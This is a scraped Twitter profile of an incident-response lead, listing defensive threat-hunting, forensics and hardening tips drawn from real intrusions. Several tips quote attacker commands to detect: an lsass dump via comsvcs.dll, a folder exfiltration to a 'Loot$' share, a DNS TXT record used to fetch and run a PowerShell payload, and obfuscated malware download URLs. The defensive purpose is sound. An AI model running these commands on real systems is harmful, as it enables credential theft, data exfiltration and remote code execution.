Stephan Berger
@malmoeb
Followers
24,700
Following
1,807
Media
978
Statuses
2,275
Head of Investigations @InfoGuardAG
Joined October 2012
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
キャンペーン開催中
• 195543 Tweets
Haitians
• 184426 Tweets
LINGORM CHEFPOM
• 158926 Tweets
高市さん
• 85744 Tweets
#海のはじまり
• 61567 Tweets
MSSP
• 35829 Tweets
99SULWHASOO X GULF
• 35556 Tweets
フルサイズ
• 33515 Tweets
iPhone16
• 28247 Tweets
SB19 PODCAST SPECIAL EPISODE
• 27578 Tweets
Hyper Band
• 27407 Tweets
くつろぎマイルーム
• 25661 Tweets
Namaz
• 24921 Tweets
Draghi
• 23258 Tweets
#بيولي_مرفوض_من_النصراويين
• 15757 Tweets
DUNK SMN EP6
• 13915 Tweets
海ちゃん
• 12825 Tweets
カヤック
• 12587 Tweets
全員無事
• 12471 Tweets
#KP_ReXXX
• 12251 Tweets
LAZLIVE WITH KAIRAIN
• 11986 Tweets
自分の道
• 10060 Tweets
#ThreatHunting
: Check the following 🔑:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user
💡 If you got a hit, the user is "hidden" 🥷 from the login screen, and you might have a backdoor account on this system. 🔍
#CyberSecurity
19
380
1K
1/ Ouch. 🫣
A TA brute-forced the password of the domain admin.
The customer first suspected an internal compromise, but upon a deeper investigation of this incident, we quickly realized that the IP address was the internal address of a Cisco ASA VPN box.
🧵
#CyberSecurity
29
262
1K
1/
#Linux
#Forensics
: pssst... I will now reveal my favorite interview question for candidates who want to work in our IR team ;) "In the process list, I see a (running) binary, but the binary is no longer present on disc. How can I restore the original binary? (screenshot 👇)"
39
217
998
1/ In one ransomware case, the attackers started an EXE file that dropped the vulnerable GIGABYTE driver to C:\Windows\System\gdrv.sys.
The TA used the vulnerable driver to load a malicious driver as a kernel driver, who hunted and killed Symantec processes. 🧵
#CyberSecurity
19
264
741
1/
#ThreatHunting
AnyDesk
Splashtop
Atera
TeamViewer
SupRemo
ScreenConnect
Remote Utilities
After breaching a network, attackers install, besides the obvious backdoors, other (legitimate) remote desktop products that can be used to re-enter the network. 🧵
#CyberSecurity
25
177
744
1/ Have you known that the "Zone.Identifier" Alternate Data Stream (ADS) not only records whether a file was downloaded from the Internet (ZoneId=3), but also from which URL and the Referrer from which the page was visited?
PS> Get-Content <filename> -Stream Zone.Identifier
16
180
730
1/ IR tip: During the first conversation with the affected customer, ask for their public IP range(s).
Next, check this IP range on
@shodanhq
(filter: "net:<ip>/<subnet>"). This has two advantages: 🧵
#CyberSecurity
11
170
715
Please do the incident response team a favor, and check that the X-Forwarded-For Header is set on all your reverse proxies / load-balancers / etc.
They will thank you later.
22
110
635
1/ Interesting infection chain:
When an LNK file is double-clicked, a decoy PDF is displayed & a DOT file is downloaded and placed in the Microsoft Word Startup folder.
The downloaded DOT file contains macro code that is now loaded every time Word is started. Let's dive in 🧵
12
209
623
We see a lot of threat actors in our Incident Response cases who disable or tamper with the local AV.
The website has a copy & paste script to turn off most of Defenders features. [1] How many of these modifications (or deactivations) will trigger an
8
178
608
The customer contacted us because "Microsoft 365 Defender has detected a security threat", more precisely, the alert "Anomalous Token involving one user" was raised.
We tasked the customer to give us access to their Azure Tenant so that we could investigate the logins and
19
111
606
Real-World
#PingCastle
Finding
#8
: Non-admin users can add computers to a domain. A customer called us because he discovered two new computer objects. Such new computer objects can be a sign of more targeted attacks against the
#ActiveDirectory
.
1/8
#CyberSecurity
#dfir
12
143
591
/1 Repeat after me: AV scans and password change is not enough after a full AD compromise.
A company has already been encrypted twice and asked us for a second opinion. The responders did a password change with an AV scan of the machines...
What could possibly go wrong? 🧵
20
116
521
1/ I ♥️ (digital) forensics because even if an attacker deleted event logs to cover his tracks, we can still find other artifacts that help us retrace his steps on the network.
In one case, the attacker used RDP to move laterally on the network but deleted the TerminalSVC logs.
9
123
511
1/ We recently had a case where a TA compromised an Azure Global Admin account.
The TA used the compromised account to spun up over 200 VMs to mine cryptos with it. The compromise was only noticed due to skyrocketing Azure costs. 💸
🧵
#CyberSecurity
28
108
512
1/ For the people who monitor PowerShell logs or command lines, these two commands would also be worth an alert:
Get-ChildItem C:\Path -Recurse -File -Filter *pass*
Get-ChildItem C:\Path -Recurse -File -Filter *kdbx*
The search for password files is obvious. 🧵
6
96
508
In a recent incident response case, the attacker ran the following command, trying to dump lsass with the well-known comsvcs.dll technique:
%COMSPEC% /Q /c cmd.eXE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do
6
142
509
1/ "Mimikatz Security Support Provider mimilib.dll will be registered as a Windows Security Package.
Once the Security Package is registered and the system is rebooted, the mimilib.dll will be loaded into lsass.exe process memory and intercept all logon passwords next time
6
131
496
I tweeted recently about how an attacker used a misconfiguration in ADCS (Active Directory Certificate Services) to gain Domain Admin rights within the network.
@JimSycurity
made me aware of Locksmith [1]: A small tool built to detect and fix common misconfigurations in Active
6
120
489
#Linux
#ThreatHunting
: The SSH-Agent creates a socket file when logging in, which can be opened by a user with administrative privileges (and can be used for lateral movement). If your Organisation records the shell history, search for the following commands (and keywords): 👇
1/
8
131
479
#ThreatHunting
: When investigating a potentially compromised Exchange server, one of the first steps I take is to search the MFT for .aspx files (with
@velocidex
's MFT Hunt, for example). Examine the results for suspicious file names or paths.
(1/3)
#CyberSecurity
8
133
481
1/ Linux
#Hardening
and
#ThreatHunting
The screenshot below is from Microsoft [1] - using XorDdos as an example, we can learn a lot about Linux forensics and hardening. 🧵
#CyberSecurity
10
149
473
1/ I presented 10
#ActiveDirectory
hardening measures a few weeks ago, and I will tweet my recommendations in the next ten days.
The list is neither prioritised nor complete, but it might give companies and administrators good input on improving (AD) security.
🧵
#CyberSecurity
5
138
477
1/ USB malware, part 4: Blast from the past. Again, a user executed a shortcut on a USB stick, which led to the execution of the following commands:
🧵
#CyberSecurity
8
106
449
Internal
#ThreatHunting
Tip: Start collecting DHCP logs in your SIEM. If the computers and servers in the network have been named according to a naming scheme, it is easy to search for outliers in the hostnames. Start hunting for rogue devices and backdoors. 👇
#CyberSecurity
14
100
418
No way, this really works! 🤯
% dig txt dfir.<redacted>.<tld> +short
[System.Reflection.Assembly]::LoadWithPartialName('.Forms'); [.Forms.MessageBox]::Show('DFIR FTW!','BlueTeam <3')
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt )[-1]"
45
407
2K
7
111
437
1/
@Unit42_Intel
published an interesting way of how malware bypassed DNS and DNS logging by using legitimate services like ip-api[.]com for domain name resolution(s). Example:
wget
Output:
success,[...],91.236.220.100
🧵
#CyberSecurity
7
117
410
Three
#Windows
#Hardening
steps to make relaying attacks more difficult:
1⃣Disable LLMNR, NBT-NS and WPAD requests (I still see WPAD requests now and then).
2⃣Disable IPv6 (internally)
3⃣Prevent users from joining computers to the domain - (ms-DS-MachineAccountQuota)
1/👇
13
98
410
1/ We recently had an interesting
#Azure
case where the TA, instead of creating a new Inbox Rule, added email addresses of interest to the list of blocked senders and domains.
The incoming emails will get flagged as spam and moved to the Junk email folder. 📂
🧵
10
89
389
1/ KMSPico is a software to (illegally) activate Windows installations.
Interestingly, KMSPico is a frequent finding in our Compromise Assessments, where users activate Windows versions of home or company computers with this software.
15
117
377
1/
#ThreatHunting
:
In a compromised network, we saw the following request in the proxy logs:
www.advanced-ip-scanner[.]com/checkupdate.php?[..]
This scanner is trendy among ransomware groups and has been mentioned in reports by
@TheDFIRReport
, among others. [1] 🧵
11
122
368
In-depth examination of the Sliver C2 framework.
I highly recommend reading this series for every BlueTeamer to understand the internals and building blocks of a (modern) C2 framework.
0
137
374
When I do a Compromise Assessment, I often ask the customer if I can do a last quick check:
Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"
If Responder could capture the hash, the firewall allows outgoing SMB connections 🚨
➡️
9
84
353
1/
#ThreatHunting
Another one for the people who monitor PowerShell logs or command lines:
Copy-Item -Path "C:\Exfiltration" -Destination "\\X.X.X.X\Loot$" -Recurse
This exfiltration method is from a recent IR case. No need to install anything, just living off the land. 😎
3
98
355
A threat actor installed the PowerShell version of SystemBC as a backdoor on a recent engagement (different C2 address, but the same code as this sample here on VT [1])
An EDR product was installed on the affected host(s) after the attacker created a malicious scheduled task,
4
80
357
1/ "By using DoH, attackers can hide DNS queries from C&C domains.
If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed."
[1] 🧵
#CyberSecurity
10
126
345
1/
#Hardening
: More and more attackers in ransomware cases are attacking the ESXi and vCenter infrastructure to encrypt a large part of the systems in a company within a short time.
13
79
339
1/ Patient Zero was an internet-exposed server with single-factor RDP.
The attackers brute-forced the password of an atypical username that was not easy to guess.
#CyberSecurity
#dfir
12
73
332
On a recent Incident Response case, we encountered the PowerShell code depicted in the screenshot below.
Welcome Cloudflare Tunnels on the stage. The TA downloaded cloudflared (the executable name of the CF Tunnels) installer package from the official GitHub repository from
11
89
336
1/
@hackerkartellet
and I were investigating an IIS web server exhibiting strange behavior (screenshot below).
Even though the customer reinstalled the server, the AppPools were still crashing regularly after the reinstall.
Let's dig in. 🕵️
#CyberSecurity
11
85
332
Easy way to install tools on a new machine:
winget install --id Microsoft.VisualStudioCode
winget install --id Microsoft.Powershell
winget install --id Notepad++.Notepad++
winget install --id
winget install --id Git.Git
winget search <term>
6
68
331
1/ In a recent investigation, we encountered HackBrowserData, "a command-line tool for decrypting and exporting browser data (passwords, history, cookies, bookmarks [..]) from the browser." [1]
Symantec also reported the usage of such software in a breach this year. [2]
🧵
2
81
329
1/ Another day, another Sin.
Today's
#3
: Ignoring or misinterpreting AV alerts.
If I had received a dime for every time I mentioned Florian's cheat sheet, I wouldn't have to work anymore. 😂
🧵
#CyberSecurity
3
77
323
In my
#FIRSTCON23
presentation, I said if an executable or a file is written into C:\Users\Public\, an alert should be raised immediately. Period.
TAs and APTs be like:
8
62
321
New blog post: AWS Ransomware
An attacker compromised an AWS account and subsequently deleted all buckets in the S3 storage.
They left a 'recovery' binary behind, which we analyzed :) Enjoy.
5
97
312
1/
#ThreatHunting
:
A few weeks ago, during an IR case, we found SystemBC, the PowerShell version, in a user's run key (screenshot below).
The (more or less) same code was documented in March this year, with 0 detections at VT back then [1]. 🧵
#CyberSecurity
3
94
308
Attackers know how to exploit misconfigured Discretionary Access Control Lists (DACLs) in Active Directory. Do you, as a defender, know it, too?
Recommend reading:
It details the theory behind DACLs and ACEs (Access Control Entries), practical methods
2
74
308
You might want to add to your list of blocked domains on your proxy / fw:
"TryCloudflare will launch a process that generates a random subdomain on . Requests to that subdomain will be proxied through the Cloudflare network to your
8
63
307
1/ On a recent investigation, we found traces of FileZilla as the exfiltration tool of choice.
The great thing is: The file recentservers.xml contains recently accessed servers :)
🧵
5
58
304
1/
#ThreatHunting
:
With NSudo, attackers can execute programmes (or commands) as "TrustedInstaller", and accordingly the actions are carried out with SYSTEM rights.
Among other things, attackers use NSudo to change various registry keys in order to disable Windows Defender. 🧵
4
94
306
4
55
297
1/
#ThreatHunting
:
"To maintain access in a compromised network, [..] actor adds or creates a new user account, frequently named DefaultAccount [..] to the device using the command net user /add." [1]
🔍 for newly created (local) accounts and hunt for default accounts 🧵
5
89
297
1/ We analyzed a breached server and found the IP address and domain from which the TA downloaded additional tools onto the server.
The initial breach happened a few months ago, but the TA uses the same server till today. 🧵
9
108
291
IMO a must-read for every defender - a nice list of various techniques for circumventing modern EDR agents. The article is well written, with many links to other resources. Thanks for sharing
@_vivami
💙
#CyberSecurity
1
86
295
1/
#ThreatHunting
for
#AsyncRAT
We have various ways to find infected hosts with AsyncRAT:
1⃣ Usage of standard C2 ports
2⃣Hunting for persistence
3⃣Mutexes FTW
4⃣Last but not least, hunting for dropped DLLs
Let's go 🤠🧵
#CyberSecurity
7
109
285
6
59
285
1/
#ThreatHunting
: "16777216" as Source Network Address could indicate an RDP tunnel via ngrok.
@SecurityAura
and I have seen the value ":%16777216" as Source Network Address within the MS-Windows-TerminalServices-LocalSessionManager/Operational Log in different investigations.
8
77
278
1/ Defender prevented the execution of the malware 'Casdet' on an endpoint.
Especially with AV alerts, besides the detection, I am always interested in the birth time of the detected file.
Was the file detected when it was written to the disk, or since when is it present? 🧵
9
55
275
Because I talked recently about my "Seven Sins," here is another classic: An external entity informed our customer that their network was compromised (and also delivered evidence that the attackers might still be inside the network).
In the initial call, we asked if the customer
11
62
272
1/
@rootsecdev
published a blog post where common misconfigurations inside the Conditional Access Policies in Azure are discussed.
In an Azure Tenant from a customer, the following CA policy was implemented: Require MFA for administrative users.
🧵
2
69
272
1/
#ThreatHunting
:
#QuasarRAT
is another RAT we see from time to time in our IR cases and was also used against NATO facilities in March. [1]
We can hunt for
1⃣ The default port within the FW logs
2⃣Mutexes
3⃣User-Agent
4⃣Persistence mechanisms
🧵
9
104
266
1/ Huh, what kind of IP address is that?
Like
@mgreen27
, we often use EvtxHunter from
@velocidex
Velociraptor to search the EventLogs. [1]
@mgreen27
even wrote an artifact for finding Public IPs in the RDPAuth log. [2]
🧵
#CyberSecurity
10
75
264
1/ "PDQ Deploy is a software deployment tool that allows system administrators to silently install almost any application or patch to multiple Windows computers simultaneously." [1]
We have investigated a ransomware case where the TA used PDQ to carry out the encryption. 🧵
5
67
264
4
69
263
/1 Sin
#4
: Insufficient AD Hardening
Of course, there are many AD attack paths, misconfigurations, and ways to get DA credentials.
But still, companies should try to set the bar as high as possible to force attackers to make mistakes we might detect.
🧵
#CyberSecurity
6
79
262
1/ While analyzing AutoRuns entries in a Compromise Assessment, my teammate
@newtt42
found four executables with different names but with the same hash (in the C:\Windows directory).
The binaries were ran as services with the following names: JXds, vdEp, JXmM, PTLt. 🧵
6
80
256
1/ Number
#10
of the
#ActiveDirectory
hardening measures:
Easy Wins (for Attackers)
🧵
#CyberSecurity
5
66
257
The amount of infected USB sticks used in customer networks still surprises me. The alerts spring up like mushrooms 😅
Here is an example from an infected USB stick containing a VBE file where the user executed a malicious file:
14
46
254
Hunting for PUAs, malware or exfiltration software which adds a new rule to the local firewall on clients or servers.
@velocidex
's PowerShell artifact FTW!
Power-🐚:
Get-NetFirewallApplicationFilter -All | Select *| ? { $_.AppPath -like "*\users\*" } | Select AppPath
2
65
256
I wonder if the attacker found out why the tool didn't work 🤔🤪 Solely copying & pasting the command line won't do the trick 🙈
Reference:
#CyberSecurity
6
35
254
I recently gave an (internal) presentation about how one can bypass AMSI on a Windows 10 machine. Apparently, some of the techniques I showcased are no longer possible on Windows 11.
But fear not; Gustav Shen has written an excellent piece about how to bypass AMSI on Windows
0
101
253
5
78
247
"Microsoft uses some undocumented back-end magic to record events by default that it deems to be malicious. Thus, Event ID 4104 events can be useful to your analysis even in environments where Script Block Logging has not been fully enabled." [1]
@nas_bench
researched this
6
70
243
1/ "The custom fields modified in the HTTP request include a hardcoded user-agent with the computer name [..]" [1]
I'm a huge fan of proxy logs and analyzing them ([2,3].
Search your proxy with a regex matching your internal hostnames - you might also catch an APT. 🪝 🧵
8
44
249
"
@Mandiant
recommends organizations review GPO settings to identify groups and accounts that have GPO edit permissions. These represent an extended attack
surface for hardening and protection."
(page 84)
Quickly done with
@velocidex
Velociraptor 💪👇
1
85
245
1/
#ThreatHunting
:
#BUMBLEBEE
seems to be the new kid on the (malware loader) block. For companies that record proxy-logs and have access to the user agents used (TLS must be broken up), I see three hunting possibilities to detect a Bumblebee infection with those logs.
4
73
244
A good reminder that any launch of an executable or script from C:\Users\Public\ should be investigated thoroughly.
#CyberSecurity
0
69
240
1/ One thing I often do and also recommend in my
#ThreatHunting
workshops is to look at the code of attack tools and exploits to understand what forensic artifacts they leave behind.
Today I looked at the "Windows Silent Process Exit Persistence" module from
@metasploit
.
5
77
242
During a recent Incident Response case, it was evident that the attacker disabled Defender on various hosts during a timeframe of a few hours.
Would you detect such behavior in your environment? Do you monitor for AV disabling and, on top of that, monitor for a threshold of
5
57
244
/1
#Hardening
"The autologon feature is provided as a convenience. [..] Additionally, when autologon is turned on, the password is stored in the registry in plain text" 👀
Let's hunt for these passwords and assess the damage if an attacker could get ahold of this password(s).🧵
10
87
241
1/
#ThreatHunting
While analyzing AutoRuns entries on a Compromise Assessment or an IR case, would you take a second look at the nssm.exe binary running as a service (picture)?
Hopefully - nssm.exe was used in an IR case by attackers to start ngrok as a service. Read more: 🧵
7
81
239
1/
#IR
-Tip: One of the (many) tasks to do after a compromise of an (AD) network is to change ALL passwords (from users to service accounts).
This step is listed as
#1
on the excellent "post compromise active directory checklist" from
@UK_Daniel_Card
(👏). 🧵
#CyberSecurity
13
71
237
1/ Another IR take from last week: Scan your perimeter regularly for open ports and services!
A customer has (internally) deployed a Tomcat with a default configuration.
Due to an (incorrect) reverse proxy configuration, the /manager endpoint was exposed to the Internet.
.. 🧵
11
74
233
1/
New years resolution 🍾: Enable PS Script Block logging and monitor these logs 🙏
In this year's "Year in Review" of
@TalosSecurity
, the PowerShell Invoke-Expression is listed as number 1⃣ of the most alerted Behavioral Protection signatures. [1]
🧵
#CyberSecurity
5
81
227
Another take about anti-virus logs: For many IT administrators, once the local AV has detected a malicious file and quarantined or deleted it, the threat is gone. Or when the AV has prevented malicious code from running. Practice shows that this assumption is wrong.
#DFIR
12
64
227
1/ Yesterday in the office, we discussed different ways to obfuscate a URL.
Let's take a current example from
@abuse_ch
hXXp://107.172.76.136/topp.exe
hXXp://1806453896/topp.exe
hXXp://0x6bac4c88/topp.exe
hXXp://0153.0254.0114.0210/topp.exe
All these are valid URL's 🤯🧵
5
77
226
This is a good article, showing how administrators can simulate risk detections for testing out Conditional Access Policies or detection capabilities.
Highly recommended ☝️
0
72
228
I 💙 xlsxgrep. Here, I'm searching for Bitcoin addresses in a bunch of Excel files:
xlsxgrep -i -P ^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$ *
"xlsxgrep is a CLI tool to search text in XLSX, XLS, CSV, TSV and ODS files. It works similarly to Unix/GNU Linux grep." [1]
Go and get it:
5
53
223
Thanks
@0xtornado
, your
#CyberChef
"CobaltStrike Shellcode Decoder Recipe" (still) works like a charm 🙏
#CyberSecurity
4
68
224
One of the potentially lesser-known ways to detect malicious behavior in your network is monitoring for cached schema files in the SchCache folder, as we saw in a recent
#ransomware
investigation (screenshot).
"Every time an application connects to the directory and attempts to
1
69
227
In a recent Incident Response case,
@hackerkartellet
investigated an intrusion where the attacker used a known vulnerability (CVE-2023-27532) in an attempt to gain access to the Veeam backup server.
The vulnerability can read Veeam passwords in plain text from the Veeam Backup
6
58
223
Interesting Business Email Compromise case from this week: After compromising a user account, the attacker collected various email addresses within the breached mailbox. The goal was to send out malicious emails to these collected addresses.
Nothing new, right? However, our
2
50
222
1/ "They tried to stay stealthy and used the sysinternal's procdump tool, renamed in error.log to bypass Windows Defender detection and dump lsass process memory" [1]
A similar trick was presented by
@mrd0x
in November 2021. [2]
🧵
#CyberSecurity
2
69
223
#ThreatHunting
:
1/ When examing AutoRuns entries during an IR or CA - would you consider a Scheduled Task with the name COMSurrogate and with the following launch string as malicious (spoiler: it is 😉)?
"powershell.exe" -windowstyle hidden
#CyberSecurity
#dfir
3
51
219
1/ A lot has been written about Named Pipes hunting, especially for finding Cobalt Strike.
Among others,
@svch0st
showcased how to find CS's (default) named pipes with
@velocidex
Velociraptor. [1] 🧵
#CyberSecurity
5
63
220